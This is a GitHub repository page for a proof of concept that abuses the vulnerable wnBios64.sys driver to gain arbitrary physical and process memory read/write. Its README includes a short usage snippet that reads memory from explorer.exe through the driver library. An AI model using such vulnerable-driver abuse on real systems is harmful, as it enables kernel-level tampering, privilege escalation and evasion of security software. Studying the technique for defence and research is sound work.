Skip to content

ItzPAX/wnbios_poc

BranchesTags

Folders and files

NameName
Last commit message
Last commit date

Latest commit

 

History

10 Commits
wnbios_poc
wnbios_poc
 
 
.gitattributes
.gitattributes
 
 
.gitignore
.gitignore
 
 
README.md
README.md
 
 
wnbios_poc.sln
wnbios_poc.sln
 
 

Repository files navigation

ZwMapViewOfSection vulnerable driver

Using wnBios64.sys for arbitrary physical memory access

How it was found

I found this driver using the VulnDriverFinder tool

Usage

#include "drv.h"

int main()
{
	wnbios_lib driver;
	uintptr_t base = driver.get_process_base("explorer.exe");
	
	if (!base)
	{
		printf("[-] process is not running\n");
		system("pause");
		return false;
	}

	UINT8 buf[3] = { 0 };
	driver.read_virtual_memory(base, buf, 2);
	printf("%s\n", buf);
	
	system("pause");

	return true;
}

Credits

GDRVLib by zer0condition

About

using wnbios64.sys for arbitrary r/w

Resources

Readme
Activity

Stars

13 stars

Watchers

1 watching

Forks

2 forks
Report repository

Releases

No releases published

Packages

No packages published

Languages